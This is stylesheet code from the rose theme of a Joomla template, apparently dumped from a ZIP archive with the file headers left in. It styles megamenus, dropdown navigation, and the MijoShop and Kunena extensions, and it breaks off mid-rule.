.t3-megamenu .mega-tab > div > ul > li {
  position: static;
}
.t3-megamenu .mega-tab > div > ul > li > .dropdown-menu {
  position: absolute;
  top: 0;
  right: 0;
  bottom: 0;
  left: 200px;
}
.t3-megamenu .mega-tab > div > ul > li > .mega-dropdown-menu {
  border: none;
  box-shadow: none;
}
.t3-megamenu .mega-tab > div > ul > li > .mega-dropdown-menu > div {
  opacity: 1 !important;
  margin-left: 0 !important;
  transition: none !important;
}
@media (min-width: 991px) {
  .t3-megamenu.animate .mega > .mega-dropdown-menu {
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    opacity: 0;
  }
  .t3-megamenu.animate .mega.animating > .mega-dropdown-menu {
    -webkit-transition: all 400ms;
    -o-transition: all 400ms;
    transition: all 400ms;
    display: block;
  }
  .t3-megamenu.animate .mega.open > .mega-dropdown-menu,
  .t3-megamenu.animate .mega.animating.open > .mega-dropdown-menu {
    opacity: 1;
  }
  .t3-megamenu.animate.zoom .mega > .mega-dropdown-menu {
    -webkit-transform: scale(0, 0);
    -ms-transform: scale(0, 0);
    -o-transform: scale(0, 0);
    transform: scale(0, 0);
    -webkit-transform-origin: 20% 20%;
    -moz-transform-origin: 20% 20%;
    -ms-transform-origin: 20% 20%;
    transform-origin: 20% 20%;
  }
  .t3-megamenu.animate.zoom .mega.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.zoom .level0 > .mega-align-center > .mega-dropdown-menu {
    -webkit-transform: scale(0, 0) translate(-50%, 0);
    -ms-transform: scale(0, 0) translate(-50%, 0);
    transform: scale(0, 0) translate(-50%, 0);
    -webkit-transform-origin: 0% 20%;
    -moz-transform-origin: 0% 20%;
    -ms-transform-origin: 0% 20%;
    transform-origin: 0% 20%;
  }
  .t3-megamenu.animate.zoom .level0 > .mega-align-center.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1) translate(-50%, 0);
    -ms-transform: scale(1, 1) translate(-50%, 0);
    transform: scale(1, 1) translate(-50%, 0);
  }
  .t3-megamenu.animate.elastic .mega > .mega-dropdown-menu {
    -webkit-transform: scale(0, 1);
    -ms-transform: scale(0, 1);
    -o-transform: scale(0, 1);
    transform: scale(0, 1);
    -webkit-transform-origin: 10% 0;
    -moz-transform-origin: 10% 0;
    -ms-transform-origin: 10% 0;
    transform-origin: 10% 0;
  }
  .t3-megamenu.animate.elastic .mega.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.elastic .level0 > .mega > .mega-dropdown-menu {
    -webkit-transform: scale(1, 0);
    -ms-transform: scale(1, 0);
    -o-transform: scale(1, 0);
    transform: scale(1, 0);
  }
  .t3-megamenu.animate.elastic .level0 .open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.elastic .level0 > .mega-align-center > .mega-dropdown-menu {
    transform: scale(1, 0) translate(-50%, 0);
    -webkit-transform: scale(1, 0) translate(-50%, 0);
    -ms-transform: scale(1, 0) translate(-50%, 0);
  }
  .t3-megamenu.animate.elastic .level0 > .mega-align-center.open > .mega-dropdown-menu {
    transform: scale(1, 1) translate(-50%, 0);
    -webkit-transform: scale(1, 1) translate(-50%, 0);
    -ms-transform: scale(1, 1) translate(-50%, 0);
  }
  .t3-megamenu.animate.slide .mega {
    
    
  }
  .t3-megamenu.animate.slide .mega.animating > .mega-dropdown-menu {
    overflow: hidden;
  }
  .t3-megamenu.animate.slide .mega > .mega-dropdown-menu > div {
    -webkit-transition: all 400ms;
    -o-transition: all 400ms;
    transition: all 400ms;
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    margin-top: -30%;
  }
  .t3-megamenu.animate.slide .mega.open > .mega-dropdown-menu > div {
    margin-top: 0%;
  }
  .t3-megamenu.animate.slide .mega .mega > .mega-dropdown-menu {
    min-width: 0;
  }
  .t3-megamenu.animate.slide .mega .mega > .mega-dropdown-menu > div {
    min-width: 200px;
    margin-top: 0;
    margin-left: -500px;
    width: 100%;
  }
  .t3-megamenu.animate.slide .mega .mega.open > .mega-dropdown-menu > div {
    margin-left: 0;
  }
}
@media (max-width: 990px) {
  .t3-megamenu .mega-inner:before,
  .t3-megamenu .mega-inner:after {
    content: " ";
    display: table;
  }
  .t3-megamenu .mega-inner:after {
    clear: both;
  }
  .t3-megamenu .row,
  .t3-megamenu .mega-dropdown-menu,
  .t3-megamenu .row [class*="col-lg-"],
  .t3-megamenu .row [class*="col-md-"],
  .t3-megamenu .row [class*="col-sm-"],
  .t3-megamenu .row [class*="col-xs-"] {
    width: 100% !important;
    min-width: 100% !important;
    left: 0 !important;
    margin-left: 0 !important;
    -webkit-transform: none !important;
    -ms-transform: none !important;
    transform: none !important;
  }
  .t3-megamenu .hidden-collapse,
  .t3-megamenu .always-show .caret,
  .t3-megamenu .always-show .dropdown-submenu > a:after .sub-hidden-collapse > .nav-child,
  .t3-megamenu .sub-hidden-collapse .caret,
  .t3-megamenu .sub-hidden-collapse > a:after {
    display: none !important;
  }
  .mega-caption {
    display: none !important;
  }
  html[dir="rtl"] .t3-megamenu .row,
  html[dir="rtl"] .t3-megamenu .mega-dropdown-menu,
  html[dir="rtl"] .t3-megamenu .row [class*="col-lg-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-md-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-sm-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-xs-"] {
    left: auto;
    right: 0 !important;
    margin-right: 0 !important;
  }
}
.t3-megamenu .mega-inner {
  padding: 20px 0;
}
.t3-megamenu .row {
  margin-left: auto;
  margin-right: auto;
}
.t3-megamenu .row + .row {
  padding-top: 10px;
  border-top: 1px solid #515151;
}
.t3-megamenu .mega-dropdown-menu {
  color: #f7f7f7;
}
.t3-megamenu .mega-group {
  border: 0 !important;
}
.t3-megamenu .dropdown-header,
.t3-megamenu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  white-space: nowrap;
}
.t3-megamenu .dropdown-header:hover,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-header:active,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-header:focus,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .mega-group-ct .row {
  margin-left: -15px;
  margin-right: -15px;
}
.t3-megamenu .mega-nav > li,
.t3-megamenu .dropdown-menu .mega-nav > li {
  border-bottom: 1px solid #515151;
}
.t3-megamenu .mega-nav > li:first-child,
.t3-megamenu .dropdown-menu .mega-nav > li:first-child {
  border-top: 1px solid #515151;
}
.t3-megamenu .mega-nav > li a,
.t3-megamenu .dropdown-menu .mega-nav > li a {
  padding: 10px;
  color: #eeeeee;
}
.t3-megamenu .mega-nav > li.open > a,
.t3-megamenu .dropdown-menu .mega-nav > li.open > a {
  background: #515151;
}
.t3-megamenu .mega-nav > li.active > a,
.t3-megamenu .dropdown-menu .mega-nav > li.active > a {
  color: #ffffff;
  background: #515151;
}
.t3-megamenu .mega-nav .dropdown-submenu > a::after {
  margin-right: 0;
}
.t3-megamenu .t3-module .module-title {
  color: #eeeeee;
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  white-space: nowrap;
  margin-bottom: 20px;
}
.t3-megamenu .t3-module .module-title:hover,
.t3-megamenu .t3-module .module-title:active,
.t3-megamenu .t3-module .module-title:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .t3-module ul,
.t3-megamenu .t3-module .nav {
  padding-left: 20px;
}
.t3-megamenu .t3-module ul li,
.t3-megamenu .t3-module .nav li {
  list-style: disc;
  display: list-item;
  float: none;
  margin: 0;
  padding: 0;
  border: 0;
}
.t3-megamenu .t3-module ul li a,
.t3-megamenu .t3-module .nav li a {
  display: inline;
  padding: 0;
  margin: 0;
  border: 0;
  font-size: 100%;
  background: none;
  font: inherit;
  white-space: normal;
  color: #f7f7f7;
}
.t3-megamenu .t3-module ul li a:hover,
.t3-megamenu .t3-module .nav li a:hover,
.t3-megamenu .t3-module ul li a:focus,
.t3-megamenu .t3-module .nav li a:focus,
.t3-megamenu .t3-module ul li a:active,
.t3-megamenu .t3-module .nav li a:active {
  background: transparent;
  color: #db00af;
  font: inherit;
}
.t3-megamenu .mega-caption {
  color: #999999;
  font-size: 12px;
  margin-top: 3px;
  font-weight: normal;
}
.t3-megamenu .nav .input-group-addon [class^="icon-"],
.t3-megamenu .nav .input-group-addon [class*=" icon-"],
.t3-megamenu .nav .input-group-addon .fa {
  margin-right: 0;
}PKԜ�\�d/�VV6purity_iii/local/css/themes/rose/legacy-navigation.cssnu&1i�.dropdown-submenu {
  position: relative;
}
.dropdown-submenu > .dropdown-menu {
  top: 0;
  left: 100%;
  margin-top: -5px;
  margin-left: -1px;
}
.dropdown-submenu.open > .dropdown-menu {
  display: block;
}
.dropdown-submenu > .dropdown-menu {
  border-radius: 0px;
}
.dropdown-submenu > a:after {
  display: block;
  content: " ";
  float: right;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
  border-width: 5px 0 5px 5px;
  border-left-color: #111111;
  margin-top: 5px;
  margin-right: -5px;
}
.dropdown-submenu.open > a:after {
  border-left-color: #ffffff;
}PKԜ�\��$OO8purity_iii/local/css/themes/rose/extras/com_mijoshop.cssnu&1i�.com_mijoshop .common-home #content_oc h1,
.com_mijoshop .common-home #content_oc h2 {
  font-size: 24px;
}
.com_mijoshop .box_oc .box-product {
  margin-left: 0;
  padding: 20px;
}
.com_mijoshop .box_oc .box-product > div {
  float: left;
  margin: 0;
  margin-right: 20px;
  width: 100%;
}
.com_mijoshop .box_oc .box-product > div .image {
  display: inline-block;
  border: 1px solid #eeeeee;
  padding: 5px;
  text-align: left;
}
.com_mijoshop .box_oc .box-product > div .image a {
  display: inline-block;
}
.com_mijoshop .box_oc .box-product > div .image img {
  border: 0;
  padding: 0;
}
.com_mijoshop .box_oc .box-product > div .name {
  padding: 10px 0;
  text-align: left;
}
.com_mijoshop .box_oc .box-product > div .price {
  margin: 10px 0;
}
.com_mijoshop .box_oc #tab-related .box-product > div {
  width: auto;
}
.com_mijoshop .box_oc .box-content .content_oc p * {
  margin: 10px 10px 10px 0;
}
.com_mijoshop #header_oc {
  margin: 0 0 20px;
  padding: 0;
}
.com_mijoshop #header_oc #currency {
  top: 0;
}
.com_mijoshop #header_oc #currency a {
  margin-top: 5px;
}
.com_mijoshop #header_oc #cart {
  border-left: 1px solid #eeeeee;
  margin-left: 20px;
  top: 5px;
}
.com_mijoshop #header_oc #cart .heading {
  margin-top: 0;
}
.com_mijoshop #header_oc #search_oc {
  top: 10px;
  width: 120px;
}
.com_mijoshop #header_oc #search_oc input[type="text"] {
  border-radius: 0;
  height: 25px;
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
.com_mijoshop #header_oc .links {
  bottom: 0;
  top: auto;
}
.com_mijoshop #currency .dropdown-menu > li,
.com_mijoshop #top-links .dropdown-menu > li {
  border-color: #eeeeee;
}
.com_mijoshop #currency .dropdown-menu > li a:hover,
.com_mijoshop #top-links .dropdown-menu > li a:hover,
.com_mijoshop #currency .dropdown-menu > li a:focus,
.com_mijoshop #top-links .dropdown-menu > li a:focus {
  color: #ffffff;
}
.com_mijoshop #currency .open a,
.com_mijoshop #top-links .open a {
  color: #444444;
}
.com_mijoshop .mijoshop .product-thumb .image img {
  max-width: 100%;
  width: 100%;
}
.com_mijoshop .mijoshop .product-thumb .caption {
  padding: 15px !important;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 {
  margin: 0 0 10px;
  font-size: 15px;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 a {
  color: #444444;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 a:hover,
.com_mijoshop .mijoshop .product-thumb .caption h4 a:focus {
  color: #db00af;
}
.com_mijoshop .mijoshop .product-thumb .caption .price {
  font-weight: 700;
  color: #db00af;
  margin-top: 10px !important;
}
.com_mijoshop .mijoshop .product-thumb .caption .price .price-tax {
  color: #999999;
  font-weight: 400;
}
.com_mijoshop #content_oc > h2 {
  margin-bottom: 30px;
  font-size: 24px;
}
.com_mijoshop #content_oc > p {
  padding: 10px 20px;
  border: 1px solid #eeeeee;
  margin-bottom: 20px !important;
  margin-top: 10px !important;
}
.com_mijoshop #content_oc .product-filter {
  padding-bottom: 10px;
}
.com_mijoshop #content_oc .product-filter .display {
  padding-top: 15px;
}
.com_mijoshop #content_oc .product-grid .product-thumb .caption {
  min-height: 200px !important;
}
.com_mijoshop #content_oc .product-list .product-thumb .image {
  padding: 0 20px 0 0;
  height: 200px;
}
.com_mijoshop #content_oc .product-list .product-thumb .image > a {
  height: 100%;
}
.com_mijoshop #content_oc .product-list .product-thumb .image img {
  max-width: 100%;
  max-height: 100%;
}
.com_mijoshop #content_oc .product-list .product-thumb .caption {
  overflow: hidden;
  margin: 0;
  padding: 20px 20px 20px 0 !important;
  min-height: 161px !important;
}
.com_mijoshop .product-info .left {
  width: 30% !important;
}
.com_mijoshop .product-info .right {
  min-height: 352px;
  width: 65% !important;
}
.com_mijoshop .product-info .right .description {
  border-top: 0;
  padding: 0 0 10px;
}
.com_mijoshop .product-info .right .cart div input[type="text"],
.com_mijoshop .product-info .right .cart div input[type="button"] {
  display: inline-block;
}
.com_mijoshop .product-info .right .cart div input[type="text"] {
  padding-left: 5px;
  padding-right: 5px;
}
.com_mijoshop .product-info .right .cart div span {
  color: #999999;
}
.com_mijoshop #tab-description,
.com_mijoshop #tab-review {
  padding: 20px;
}
.com_mijoshop .content_oc ul {
  list-style: none;
  margin: 0;
  padding: 0;
}
.com_mijoshop .cart-info .quantity input[type='text'] {
  -webkit-box-sizing: content-box;
  -moz-box-sizing: content-box;
  box-sizing: content-box;
  height: 28px;
  padding-top: 0;
  padding-bottom: 0;
}
.com_mijoshop .cart-module #coupon input,
.com_mijoshop .cart-module #voucher input {
  display: inline-block;
}
.com_mijoshop .cart-module #shipping table {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
}
.com_mijoshop .cart-module #shipping table td {
  padding: 10px 20px;
}
.com_mijoshop .box-category ul li {
  padding: 10px 10px 10px 0;
}
.com_mijoshop #colorbox {
  box-sizing: unset !important;
}
.com_mijoshop #column-right .row > div {
  width: 100%;
  float: none;
}
.com_mijoshop .t3-sidebar .mijoshop .container_oc .row > div {
  width: 100%;
  float: none;
}PKԜ�\�!‰�h�h6purity_iii/local/css/themes/rose/extras/com_kunena.cssnu&1i�#kunena.layout .btn-group .dropdown-menu {
  background: #ffffff;
  border-color: #d5d5d5;
}
#kunena.layout .btn-group .dropdown-menu li {
  border-top: 1px solid #d5d5d5;
}
#kunena.layout .btn-group .dropdown-menu li a {
  color: #444444;
}
#kunena.layout .btn-group .dropdown-menu li a:hover {
  background-color: #eeeeee;
}
#kunena.layout .btn-group .dropdown-menu li:empty {
  display: none;
}
#kunena.layout .navbar {
  background: transparent;
  border: 0;
  border-bottom: 3px solid #db00af;
  border-radius: 0;
  min-height: 0;
}
#kunena.layout .navbar .nav {
  margin-bottom: 0;
  width: auto;
}
#kunena.layout .navbar .nav > li {
  margin-right: 3px;
  margin-left: 0;
}
#kunena.layout .navbar .nav > li > a {
  background-color: #444444;
  border-radius: 2px 2px 0 0;
  color: #ffffff;
  font-weight: 400;
  line-height: 1.42857143;
  padding: 5px 10px;
  text-transform: none;
}
#kunena.layout .navbar .nav > li > a:hover,
#kunena.layout .navbar .nav > li > a:focus,
#kunena.layout .navbar .nav > li > a:active {
  background-color: #222222;
  box-shadow: none;
}
#kunena.layout .navbar .nav > li.active a {
  background-color: #db00af;
  box-shadow: none;
}
@media (max-width: 1199px) {
  #kunena.layout .navbar .navbar-nav.pull-left > div {
    padding-top: 10px;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .btn {
    background: #db00af;
    color: #ffffff;
    text-align: center;
    text-decoration: none;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse {
    background: #ffffff;
    display: none;
    padding: 0;
    position: absolute;
    width: 100%;
    z-index: 10;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse.in {
    display: block;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav {
    border: 1px solid #eeeeee;
    display: block;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li {
    background: #ffffff;
    border: 0;
    margin-right: 0;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a {
    background: #ffffff;
    color: #444444;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:hover,
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:focus,
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:active {
    color: #db00af;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li.active a {
    color: #db00af;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li + li {
    border-top: 1px solid #eeeeee;
  }
}
#kunena.layout .navbar .mobile-user {
  border-radius: 0;
  color: #444444;
  margin-right: 0;
  margin-top: 0 !important;
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle {
  background-color: transparent;
  border-radius: 0;
  color: #444444;
  padding: 5px 10px;
  line-height: 20px;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle:hover,
#kunena.layout .navbar .mobile-user .dropdown-toggle:focus,
#kunena.layout .navbar .mobile-user .dropdown-toggle:active {
  background-color: transparent;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle img {
  box-shadow: none;
  height: 17px;
  width: 17px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu {
  background: #ffffff;
  border: 1px solid #eeeeee;
  padding: 20px;
  min-width: 270px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .form-group > div + div {
  margin-top: 10px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .input-group input {
  width: 100%;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .thumbnail {
  border: 1px solid #eeeeee;
  line-height: 50px;
  height: 50px;
  width: 50px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .thumbnail .glyphicon {
  font-size: 14px;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .fa-big {
  color: #666666;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .list-unstyled li {
  font-size: 11px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .divider {
  background: #eeeeee;
  height: 1px;
  margin: 10px 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link {
  color: #666666;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:hover,
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:focus,
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:active {
  color: #db00af;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .kavatar {
  max-width: 60px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form label {
  border: 0;
  padding: 0;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form a.btn {
  border: 0;
  padding: 0;
  margin-bottom: 5px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .fa {
  margin-right: 5px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu a.btn {
  border: 0;
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #logout-form {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #logout-form .btn {
  border: 0;
  margin: 0;
  padding: 0;
}
@media (max-width: 1199px) {
  #kunena.layout .navbar .mobile-user .dropdown-menu a[data-target="#statusTextModal"] {
    pointer-events: none;
  }
}
#kunena.layout .navbar .mobile-user .list-unstyled li + li {
  margin-top: 5px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu {
  left: auto;
  right: 0;
  width: 250px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a {
  color: #444444;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:hover,
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:focus,
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:active {
  color: #8f0072;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form {
  padding: 0 10px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form > div {
  border: 1px solid #eeeeee;
  border-radius: 3px;
  display: inline-block;
  margin-bottom: 5px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form > div .btn {
  font-size: 12px;
  padding: 0 5px 2px;
  text-transform: none;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu .btn {
  padding-top: 0;
  padding-bottom: 0;
}
#kunena.layout #jumpto {
  margin-bottom: 20px;
}
#kunena.layout .table > thead > tr > th,
#kunena.layout .table > tbody > tr > th,
#kunena.layout .table > tfoot > tr > th,
#kunena.layout .table > thead > tr > td,
#kunena.layout .table > tbody > tr > td,
#kunena.layout .table > tfoot > tr > td {
  padding: 15px;
}
#kunena.layout .well {
  background: transparent;
  border: 1px solid #eeeeee;
  box-shadow: none;
}
#kunena.layout .topictitle {
  color: #222222;
  font-weight: 500;
  font-size: 16px;
}
#kunena.layout .topictitle:hover,
#kunena.layout .topictitle:focus,
#kunena.layout .topictitle:active {
  color: #db00af;
}
#kunena.layout .started {
  color: #999999;
  font-size: 13px;
  margin-top: 3.33333333px;
}
#kunena.layout .container-fluid .col-md-9 {
  padding-right: 0;
}
#kunena.layout .modal {
  position: fixed;
}
#kunena.layout .table {
  border: 1px solid #eeeeee;
  float: none;
}
#kunena.layout .table .col-md-2 .col-md-3,
#kunena.layout .table .col-md-3 .col-md-3 {
  padding-right: 10px;
}
#kunena.layout .table .kavatar {
  background: #ffffff;
  border: 1px solid #eeeeee;
  display: block;
  padding: 3px;
}
#kunena.layout .table thead {
  background: #444444;
  color: #ffffff;
  font-size: 14px;
}
#kunena.layout .table thead .well {
  color: #444444;
}
#kunena.layout .table thead tr td {
  border: 0;
}
#kunena.layout .table thead tr td + td {
  border-left: 1px solid rgba(255, 255, 255, 0.2);
}
#kunena.layout .table tr td {
  border: 1px solid #eeeeee;
  float: none !important;
}
#kunena.layout .table tr td.col-md-5 {
  position: relative;
  min-height: 1px;
  padding-left: 15px;
  padding-right: 15px;
}
@media (min-width: 992px) {
  #kunena.layout .table tr td.col-md-5 {
    float: left;
    width: 33.33333333%;
  }
}
#kunena.layout .table tr td.col-md-2 + .col-md-2 {
  position: relative;
  min-height: 1px;
  padding-left: 15px;
  padding-right: 15px;
}
@media (min-width: 992px) {
  #kunena.layout .table tr td.col-md-2 + .col-md-2 {
    float: left;
    width: 25%;
  }
}
#kunena.layout .table td.hidden-xs > a {
  color: #999999;
}
#kunena.layout .table td.hidden-xs > a:hover,
#kunena.layout .table td.hidden-xs > a:focus,
#kunena.layout .table td.hidden-xs > a:active {
  color: #8f0072;
}
#kunena.layout tbody .col-md-2,
#kunena.layout tbody .col-md-3 {
  color: #666666;
  font-size: 13px;
}
#kunena.layout .btn {
  font-size: 12px;
  padding: 6.66666667px 10px;
  margin-top: 0;
  line-height: 1;
}
#kunena.layout .btn .caret {
  border-top-color: #ffffff;
}
#kunena.layout .btn-default {
  background: #ffffff;
  border: 1px solid #eeeeee;
  color: #666666;
}
#kunena.layout .btn-default .caret {
  border-top-color: #666666;
}
#kunena.layout .btn-default:hover,
#kunena.layout .btn-default:focus,
#kunena.layout .btn-default:active {
  background: #f7f7f7;
}
#kunena.layout .btn-group + .btn-group {
  margin-left: 5px;
}
#kunena.layout #btn_report {
  background: #ffffff;
  border: 1px solid #eeeeee;
  color: #666666;
  padding: 4px 10px;
}
#kunena.layout #btn_report .fa {
  color: #ff8800;
}
#kunena.layout #btn_report:hover,
#kunena.layout #btn_report:focus,
#kunena.layout #btn_report:active {
  border-color: #ff8800;
}
#kunena.layout .kfrontend {
  padding-top: 0;
  margin-bottom: 20px;
  padding-bottom: 0;
}
#kunena.layout .kfrontend:before,
#kunena.layout .kfrontend:after {
  content: " ";
  display: table;
}
#kunena.layout .kfrontend:after {
  clear: both;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa {
  background: transparent;
  border: 1px solid #999999;
  color: #999999;
  height: 28px;
  line-height: 22px;
  padding: 0;
  margin: 8px 12px 0 0;
  visibility: visible;
  text-align: center;
  width: 28px;
  opacity: 0.2;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:before {
  font-size: 24px;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:hover {
  opacity: 0.5;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:hover:before {
  color: #ffffff;
}
#kunena.layout .kfrontend h1,
#kunena.layout .kfrontend h2.btn-link {
  background-color: #444444;
  font-size: 17px;
  font-weight: 500;
  padding: 10px 20px;
  margin: 0;
}
#kunena.layout .kfrontend h1 a,
#kunena.layout .kfrontend h2.btn-link a {
  color: #ffffff;
}
#kunena.layout .kfrontend h1 a:hover,
#kunena.layout .kfrontend h2.btn-link a:hover,
#kunena.layout .kfrontend h1 a:focus,
#kunena.layout .kfrontend h2.btn-link a:focus,
#kunena.layout .kfrontend h1 a:active,
#kunena.layout .kfrontend h2.btn-link a:active {
  border-bottom: 0;
  text-decoration: none;
}
#kunena.layout .kfrontend h1:hover,
#kunena.layout .kfrontend h2.btn-link:hover {
  text-decoration: none;
}
#kunena.layout .kfrontend .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
#kunena.layout .kfrontend .section {
  margin-bottom: 0;
}
#kunena.layout .kfrontend .section:before,
#kunena.layout .kfrontend .section:after {
  content: " ";
  display: table;
}
#kunena.layout .kfrontend .section:after {
  clear: both;
}
#kunena.layout .kfrontend .section table {
  border: 1px solid #eeeeee;
}
#kunena.layout .kfrontend .section table th,
#kunena.layout .kfrontend .section table td {
  border: 1px solid #eeeeee;
  padding: 10px 20px;
}
#kunena.layout .kfrontend .section table tr {
  background-color: #f7f7f7;
}
#kunena.layout .kfrontend .section table tr.category {
  background-color: #ffffff;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 {
  width: 8%;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 a {
  display: block;
  color: #999999;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:hover,
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:focus,
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:active {
  color: #8f0072;
}
@media (min-width: 992px) {
  #kunena.layout .kfrontend .section table tr.category .col-md-8 {
    width: 35%;
  }
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 {
  vertical-align: middle;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 {
  padding: 0;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 div {
  padding: 0;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 .col-md-4 {
  padding-right: 10px;
  margin-top: 5px;
  width: 40px;
}
@media (min-width: 992px) {
  #kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 .col-md-8 {
    width: auto;
    max-width: 80%;
  }
}
#kunena.layout .kfrontend .section table tr.category:nth-child(2n+1) {
  background-color: #f7f7f7;
}
#kunena.layout .kfrontend .section table .well {
  background-color: transparent;
  box-shadow: none;
  border: 0;
  padding: 0;
}
#kunena.layout .kfrontend .section table .header-desc {
  margin-top: 10px;
  margin-bottom: 10px;
}
#kunena.layout .kfrontend .section table ul.list-inline {
  border-top: 1px solid #eeeeee;
  padding-top: 10px;
}
#kunena.layout .kfrontend .section table ul.list-inline li {
  margin-bottom: 5px;
}
#kunena.layout .kfrontend .section table ul.list-inline li a {
  color: #444444;
}
#kunena.layout .kfrontend .section table ul.list-inline li a i {
  color: #999999;
}
#kunena.layout .kfrontend .section table ul.list-inline li a:hover,
#kunena.layout .kfrontend .section table ul.list-inline li a:focus,
#kunena.layout .kfrontend .section table ul.list-inline li a:active {
  color: #8f0072;
}
#kunena.layout .kfrontend .section table ul.list-inline li a:hover i,
#kunena.layout .kfrontend .section table ul.list-inline li a:focus i,
